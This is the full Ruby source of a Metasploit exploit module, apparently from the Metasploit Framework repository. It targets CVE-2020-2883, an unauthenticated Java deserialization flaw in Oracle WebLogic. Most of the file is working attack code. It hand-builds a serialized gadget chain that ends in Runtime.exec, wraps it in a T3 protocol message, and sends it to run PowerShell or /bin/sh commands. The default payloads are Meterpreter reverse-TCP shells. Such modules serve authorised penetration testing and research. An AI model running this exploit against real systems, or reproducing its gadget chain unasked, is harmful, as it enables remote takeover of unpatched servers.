GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
  # Target table: index 0 (Windows) is the DefaultTarget below. The Unix
  # target goes through the CmdStager with the printf flavor.
  targets = [
    [
      'Windows',
      {
        'Platform' => 'win',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
      }
    ],
    [
      'Unix',
      {
        'Platform' => %w[unix linux],
        'CmdStagerFlavor' => 'printf',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
      }
    ],
  ]

  # IOC_IN_LOGS: every attempt leaves a T3 handshake plus a deserialization
  # request on the target, regardless of outcome.
  notes = {
    'Reliability' => [REPEATABLE_SESSION],
    'Stability' => [CRASH_SAFE],
    'SideEffects' => [IOC_IN_LOGS]
  }

  super(
    update_info(
      info,
      'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp',
      'Description' => %q{
        There exists a Java object deserialization vulnerability
        in multiple versions of WebLogic.

        Unauthenticated remote code execution can be achieved by
        sending a serialized `BadAttributeValueExpException`
        object over the T3 protocol to vulnerable versions of
        WebLogic. Leveraging an `ExtractorComparator` enables
        the ability to trigger `method.invoke()`, which will
        execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Quynh Le', # Vulnerability Discovery
        'Y4er', # PoC
        'Shelby Pace', # Metasploit Module
        'Steve Embling' # T3S additions
      ],
      'References' => [
        [ 'CVE', '2020-2883' ],
        [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
      ],
      'Platform' => %w[unix linux win],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Privileged' => false,
      'Targets' => targets,
      'DisclosureDate' => '2020-04-30',
      'DefaultTarget' => 0,
      'Notes' => notes
    )
  )

  # 7001 is the default WebLogic T3/HTTP listener port.
  register_options([
    Opt::RPORT(7001),
  ])

  # With SSL set, t3_handshake speaks "t3s" unless this forces plain "t3".
  register_advanced_options([
    OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
  ])
end
def check
  connect

  # Version probe: an HTTP request for the console login page is written
  # over the connected RPORT socket and the banner is scraped for the
  # "WebLogic Server Version:" string.
  sock.put("GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n")
  sleep(2)
  banner = sock.get
  return CheckCode::Unknown('Failed to obtain response from service') unless banner

  match = banner.match(/WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/)
  return CheckCode::Unknown('Failed to detect WebLogic') unless match

  # @version_no is read by the *_uid helpers when the payload is built, so
  # this side effect is part of the contract, not just reporting.
  @version_no = Rex::Version.new(match[:version])
  print_status("WebLogic version detected: #{@version_no}")

  # Only these exact releases are reported as Appears; any other detected
  # version (including other patch levels) is reported as Detected.
  vulnerable_versions = %w[12.1.3.0.0 12.2.1.3.0 12.2.1.4.0].map { |v| Rex::Version.new(v) }
  return CheckCode::Appears if vulnerable_versions.include?(@version_no)

  CheckCode::Detected('Version of WebLogic is not vulnerable')
ensure
  disconnect
end
def exploit
  connect
  print_status('Sending handshake...')
  t3_handshake

  # Unix targets are staged by the CmdStager mixin, which drives
  # execute_command below chunk by chunk.
  unless target.name == 'Windows'
    execute_cmdstager
    return
  end

  # Windows: a single PowerShell command line, wrapped for cmd.exe and
  # delivered as one serialized object. String#prepend mutates in place.
  psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
  t3_send(build_payload_obj(psh_cmd.prepend('cmd.exe /c ')))
ensure
  disconnect
end
def t3_handshake
  # Hex of the client greeting "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n";
  # the protocol token becomes "t3s" when SSL is on and FORCE_T3 is off.
  # The greeting is fixed, so it is a stable marker of this module's traffic.
  proto = datastore['SSL'] && !datastore['FORCE_T3'] ? '743373' : '7433'
  greeting = proto +
             '2031322e322e310a41533a323535' +
             '0a484c3a31390a4d533a313030303030' +
             '30300a0a'

  sock.put([greeting].pack('H*'))
  sleep(1)
  # Returns whatever the server answers (consumed, not parsed).
  sock.get_once
end
# Builds the hex-encoded Java serialization stream that t3_send embeds in
# the T3 message. As the inline decodes show, it is a java.util.PriorityQueue
# whose comparator is a com.tangosol ExtractorComparator wrapping a
# ChainedExtractor of three ReflectionExtractors (getRuntime, getMethod,
# invoke) whose final String array holds the command from format_payload.
#
# SerialVersionUIDs, a field count, one field descriptor and some
# back-reference handles differ between WebLogic releases, so those pieces
# come from the version-keyed helpers (extractor_comp_uid,
# chained_extractor_uid, abstract_extractor_uid, reflection_extractor_uid,
# reflect_extract_count, add_sect, add_tc_null, change_handle?), all of
# which read @version_no as set by check.
#
# @param payload_data [String] command line; format_payload splits it into
#   at most three space-separated arguments
# @return [String] lowercase hex string (not raw bytes); t3_send packs it
def build_payload_obj(payload_data)
  payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23
  payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue
  payload_obj << '94da30b4fb3f82b1' # SerialVersionUID
  payload_obj << '030002' # 2 fields
  payload_obj << '490004' # Integer, field name length: 4
  payload_obj << '73697a65' # size
  payload_obj << '4c000a' # Object, field name length: 10
  payload_obj << '636f6d70617261746f72' # comparator
  payload_obj << '740016' # String, field name length: 22
  payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;
  payload_obj << '7870'
  payload_obj << '00000002'
  payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  payload_obj << '0030' # Class name length: 48
  payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator
  payload_obj << '6d70617261746f722e457874726163746f72436f'
  payload_obj << '6d70617261746f72'
  payload_obj << extractor_comp_uid # SerialVersionUID (version dependent)
  payload_obj << '020001' # Serializable, 1 field
  payload_obj << '4c000b' # Object, field name length: 11
  payload_obj << '6d5f657874726163746f72' # m_extractor
  payload_obj << '740022'
  payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;
  payload_obj << '616c7565457874726163746f723b'
  payload_obj << '7870'
  payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  payload_obj << '002c' # Class name length: 44
  payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor
  payload_obj << '74726163746f722e436861696e65644578747261'
  payload_obj << '63746f72'
  payload_obj << chained_extractor_uid # SerialVersionUID (version dependent)
  payload_obj << '020000'
  payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  payload_obj << '0036' # Class name length: 54
  payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor
  payload_obj << '74726163746f722e4162737472616374436f6d70'
  payload_obj << '6f73697465457874726163746f72'
  payload_obj << '086b3d8c05690f44' # SerialVersionUID
  payload_obj << '020001' # Serializable, 1 field
  payload_obj << '5b000c' # array, length: 12
  payload_obj << '6d5f61457874726163746f72' # m_aExtractor
  payload_obj << '740023' # String, length: 35
  payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;
  payload_obj << '56616c7565457874726163746f723b'
  payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  payload_obj << '002d' # Class name length: 45
  payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor
  payload_obj << '74726163746f722e416273747261637445787472'
  payload_obj << '6163746f72'
  payload_obj << abstract_extractor_uid # SerialVersionUID (version dependent)
  payload_obj << '020001' # Serializable, 1 field
  payload_obj << '490009' # Integer, field name length: 9
  payload_obj << '6d5f6e546172676574' # m_nTarget
  payload_obj << '7870'
  payload_obj << '00000000'
  payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
  payload_obj << '0023' # Class name length: 35
  payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;
  payload_obj << '56616c7565457874726163746f723b'
  payload_obj << '2246204735c4a0fe' # SerialVersionUID
  payload_obj << '020000'
  payload_obj << '7870'
  payload_obj << '00000003' # array length: 3 extractors follow
  payload_obj << '7372'
  payload_obj << '002f' # Class name length: 47
  payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor
  payload_obj << '74726163746f722e5265666c656374696f6e4578'
  payload_obj << '74726163746f72'
  payload_obj << reflection_extractor_uid # SerialVersionUID (version dependent)
  payload_obj << '02000' # Serializable; the field-count nibble follows
  payload_obj << reflect_extract_count # '3' or '2' -> '020003' / '020002'
  payload_obj << '5b0009' # array, length: 9
  payload_obj << '6d5f616f506172616d' # m_aoParam
  payload_obj << '740013' # String, length: 19
  payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;
  payload_obj << add_sect # extra m_extractorCached field descriptor, or '' (version dependent)
  payload_obj << '4c0009' # Object, length: 9
  payload_obj << '6d5f734d6574686f64' # m_sMethod
  payload_obj << '740012' # String, length: 18
  payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
  payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
  payload_obj << '007e0009' # handle
  payload_obj << '00000000'
  payload_obj << '7572'
  payload_obj << '0013' # Class name length: 19
  payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;
  payload_obj << '90ce589f1073296c' # SerialVersionUID
  payload_obj << '020000'
  payload_obj << '7870'
  payload_obj << '00000002'
  payload_obj << '74000a' # String, length: 10
  payload_obj << '67657452756e74696d65' # getRuntime
  payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
  payload_obj << '0012' # Class name length: 18
  payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;
  payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
  payload_obj << '020000' # Serializable, no fields
  payload_obj << '7870'
  payload_obj << '00000000'
  payload_obj << add_tc_null # TC_NULL ('70') only for 12.2.1.3.0, else ''
  payload_obj << '740009' # String, length: 9
  payload_obj << '6765744d6574686f64' # getMethod
  payload_obj << '7371'
  payload_obj << '007e000d' # handle
  payload_obj << '00000000'
  payload_obj << '7571'
  payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle shifts by one on 12.2.1.3.0 (extra field above)
  payload_obj << '00000002'
  payload_obj << '707571'
  payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle
  payload_obj << '00000000'
  payload_obj << add_tc_null
  payload_obj << '740006' # String, length: 6
  payload_obj << '696e766f6b65' # invoke
  payload_obj << '7371'
  payload_obj << '007e000d' # handle
  payload_obj << '00000000'
  payload_obj << '7571'
  payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle
  payload_obj << '00000001'
  payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
  payload_obj << '0013' # Class name length: 19
  payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;
  payload_obj << 'add256e7e91d7b47' # SerialVersionUID
  payload_obj << '020000'
  payload_obj << '7870'
  payload_obj << '00000003' # array length: 3 strings, matching format_payload's split(' ', 3)

  payload_bin = format_payload(payload_data)
  payload_obj << payload_bin

  payload_obj << add_tc_null
  payload_obj << '740004'
  payload_obj << '65786563' # exec
  payload_obj << '7704'
  payload_obj << '00000003'
  payload_obj << '76720011'
  payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime
  payload_obj << '0000000000000000000000'
  payload_obj << '7870'
  payload_obj << '740001'
  payload_obj << '3178'
end
def extractor_comp_uid
  # SerialVersionUID (hex) of com.tangosol.util.comparator.ExtractorComparator
  # for the release recorded in @version_no by check. Anything that matches
  # neither listed release, including a nil @version_no, takes the last value.
  if Rex::Version.new('12.1.3.0.0') == @version_no
    'c7ad6d3a676f3c18'
  elsif Rex::Version.new('12.2.1.3.0') == @version_no
    'fb4ac83df1d72edc'
  else
    'f9b3bc58cc52cd21'
  end
end
def change_handle?
  # True only for 12.2.1.3.0, whose extra field descriptor (see add_sect)
  # shifts the TC_REFERENCE handles used in build_payload_obj by one.
  shifted_release = Rex::Version.new('12.2.1.3.0')
  @version_no == shifted_release
end
def chained_extractor_uid
  # SerialVersionUID (hex) of com.tangosol.util.extractor.ChainedExtractor
  # for the release in @version_no; unmatched or nil falls through to the
  # last value.
  if Rex::Version.new('12.1.3.0.0') == @version_no
    '889f81b0945d5b7f'
  elsif Rex::Version.new('12.2.1.3.0') == @version_no
    '06ee10433a4cc4b4'
  else
    '435b250b72f63db5'
  end
end
def abstract_extractor_uid
  # SerialVersionUID (hex) of com.tangosol.util.extractor.AbstractExtractor
  # for the release in @version_no; unmatched or nil falls through to the
  # last value.
  if Rex::Version.new('12.1.3.0.0') == @version_no
    '658195303e723821'
  elsif Rex::Version.new('12.2.1.3.0') == @version_no
    '752289ad4d460138'
  else
    '9b1be18ed70100e5'
  end
end
def reflection_extractor_uid
  # SerialVersionUID (hex) of com.tangosol.util.extractor.ReflectionExtractor
  # for the release in @version_no; unmatched or nil falls through to the
  # last value.
  if Rex::Version.new('12.1.3.0.0') == @version_no
    'ee7ae995c02fb4a2'
  elsif Rex::Version.new('12.2.1.3.0') == @version_no
    '87973791b26429dd'
  else
    '1f62f564b951b614'
  end
end
def reflect_extract_count
  # Field-count nibble for the ReflectionExtractor class descriptor:
  # 12.2.1.3.0 serializes three fields (add_sect supplies the third),
  # every other value of @version_no two.
  Rex::Version.new('12.2.1.3.0') == @version_no ? '3' : '2'
end
def add_sect
  # Field descriptor for m_extractorCached (Ljava/lang/Object;), which only
  # the 12.2.1.3.0 ReflectionExtractor carries; empty string otherwise.
  return '' unless @version_no == Rex::Version.new('12.2.1.3.0')

  [
    '4c0011',               # Object, length: 17
    '6d5f657874726163746f', # m_extractorCached
    '72436163686564',
    '740012',
    '4c6a6176612f6c616e67', # Ljava/lang/Object;
    '2f4f626a6563743b'
  ].join
end
def add_tc_null
  # A TC_NULL byte (0x70) for the extra field on 12.2.1.3.0; nothing for
  # any other @version_no.
  @version_no == Rex::Version.new('12.2.1.3.0') ? '70' : ''
end
# Wraps an already hex-encoded serialized object in a T3 request and writes
# it to the connected socket. The message is a fixed capture (header,
# ClassTableEntry/PackageInfo/PeerInfo/VersionInfo descriptors, two JVMID
# objects) with the caller's object spliced in between 'fe010000'
# separators; only the 4-byte length prefix is recomputed at the end.
#
# The JVMID identity strings (127.0.1.1, us-l-breens) come from the
# original capture and are sent verbatim on every run, so they are a
# stable artifact of this module's traffic.
#
# @param payload_obj [String] lowercase hex string from build_payload_obj
# @return [Integer] the value of the trailing sleep(1); callers ignore it
def t3_send(payload_obj)
  print_status('Sending object...')

  request_obj = '000009f3' # Original packet length; placeholder, overwritten below
  request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
  request_obj << 'ffffffffffffffff'
  request_obj << '00000071'
  request_obj << '0000ea60'
  request_obj << '00000018432ec6'
  request_obj << 'a2a63985b5af7d63e643'
  request_obj << '83f42a6d92c9e9af0f94'
  request_obj << '72027973720078720178'
  request_obj << '720278700000000c0000'
  request_obj << '00020000000000000000'
  request_obj << '00000001007070707070'
  request_obj << '700000000c0000000200'
  request_obj << '00000000000000000000'
  request_obj << '01007006'
  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '001d' # Class name length: 29
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
  request_obj << '6a766d2e436c61737354'
  request_obj << '61626c65456e747279'
  request_obj << '2f52658157f4f9ed' # SerialVersionUID
  request_obj << '0c0000' # flags?
  request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5061636b61'
  request_obj << '6765496e666f'
  request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
  request_obj << '020009' # Serializable, 9 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '4c0009' # Field type: Object, field name length: 9
  request_obj << '696d706c5469746c65' # implTitle
  request_obj << '740012' # String, length: 18
  request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
  request_obj << '2f537472696e673b'
  request_obj << '4c000a' # Field type: Object, field name length: 10
  request_obj << '696d706c56656e646f72' # implVendor
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '4c000b' # Field type: Object, field name length: 11
  request_obj << '696d706c56657273696f6e' # implVersion
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  request_obj << '7702' # TC_ENDBLOCKDATA
  request_obj << '000078'
  request_obj << 'fe010000' # separator

  # The caller's serialized object (hex) goes here, between separators.
  request_obj << payload_obj

  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '001d' # Class name length: 29
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
  request_obj << '6a766d2e436c61737354'
  request_obj << '61626c65456e747279'
  request_obj << '2f52658157f4f9ed' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
  request_obj << '0021' # Class name length: 33
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5065657249'
  request_obj << '6e666f'
  request_obj << '585474f39bc908f1' # SerialVersionUID
  request_obj << '020007' # Serializable, 7 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '5b0008' # Field type: Array, field name length: 8
  request_obj << '7061636b61676573' # packages
  request_obj << '740027' # String, length: 39
  request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
  request_obj << '2f636f6d6d6f6e2f696e'
  request_obj << '7465726e616c2f506163'
  request_obj << '6b616765496e666f3b'
  request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5665727369'
  request_obj << '6f6e496e666f'
  request_obj << '972245516452463e' # SerialVersionUID
  request_obj << '020003' # Serializable, 3 fields
  request_obj << '5b0008' # Field type: Array, field name length: 8
  request_obj << '7061636b61676573' # packages
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '4c000e' # Field type: Object, field name length: 14
  request_obj << '72656c65617365566572' # releaseVersion
  request_obj << '73696f6e'
  request_obj << '740012' # String, length: 18
  request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
  request_obj << '2f537472696e673b'
  request_obj << '5b0012' # Field type: Array, field name length: 18
  request_obj << '76657273696f6e496e66' # versionInfoAsBytes
  request_obj << '6f41734279746573'
  request_obj << '740002' # String, length: 2
  request_obj << '5b42' # [B
  request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5061636b61'
  request_obj << '6765496e666f'
  request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
  request_obj << '020009' # Serializable, 9 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '4c0009' # Field type: Object, field name length: 9
  request_obj << '696d706c5469746c65' # implTitle
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '4c000a' # Field type: Object, field name length: 10
  request_obj << '696d706c56656e646f72' # implVendor
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '4c000b' # Field type: Object, field name length: 11
  request_obj << '696d706c56657273696f' # implVersion
  request_obj << '6e'
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
  request_obj << 'fe00ff' # separator
  request_obj << 'fe010000'
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '0013' # Class name length: 19
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
  request_obj << '6a766d2e4a564d4944'
  request_obj << 'dc49c23ede121e2a' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
  request_obj << '4621'
  request_obj << '000000000000000000'
  request_obj << '09' # length: 9
  request_obj << '3132372e302e312e31' # 127.0.1.1 (fixed, from the original capture)
  request_obj << '000b' # length: 11
  request_obj << '75732d6c2d627265656e' # us-l-breens (fixed, from the original capture)
  request_obj << '73'
  request_obj << 'a53caff10000000700'
  request_obj << '001b59'
  request_obj << 'ffffffffffffffffffff'
  request_obj << 'ffffffffffffffffffff'
  request_obj << 'ffffffff'
  request_obj << '0078'
  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '0013' # Class name length: 19
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
  request_obj << '6a766d2e4a564d4944'
  request_obj << 'dc49c23ede121e2a' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
  request_obj << '1d0181401281'
  request_obj << '34bf427600093132372e'
  request_obj << '302e312e31a53caff1'
  request_obj << '000000000078'

  # Two hex chars per byte; the total byte length replaces the placeholder
  # in the first 4 bytes (8 hex chars) of the message.
  new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
  request_obj[0, 8] = new_len

  sock.put([request_obj].pack('H*'))
  sleep(1)
end
def format_payload(payload_cmd)
  print_status('Formatting payload...')

  # Split on whitespace into at most three parts (e.g. "/bin/sh", "-c",
  # "<rest of the command>") and encode each as a Java TC_STRING: 0x74, a
  # 2-byte big-endian length, then the bytes in hex. Note the length comes
  # from String#length (characters) while the body is the raw bytes, and
  # rjust does not cap at 0xffff; callers are expected to pass ASCII
  # command lines well under that size.
  payload_cmd.split(' ', 3).map do |part|
    '74' + part.length.to_s(16).rjust(4, '0') + part.unpack1('H*')
  end.join
end
def execute_command(cmd, _opts = {})
  # CmdStager callback for the Unix target: each staged chunk is wrapped for
  # /bin/sh and sent through build_payload_obj/t3_send. String#prepend
  # mutates the caller's cmd in place.
  shell_cmd = cmd.prepend('/bin/sh -c ')
  t3_send(build_payload_obj(shell_cmd))
end
end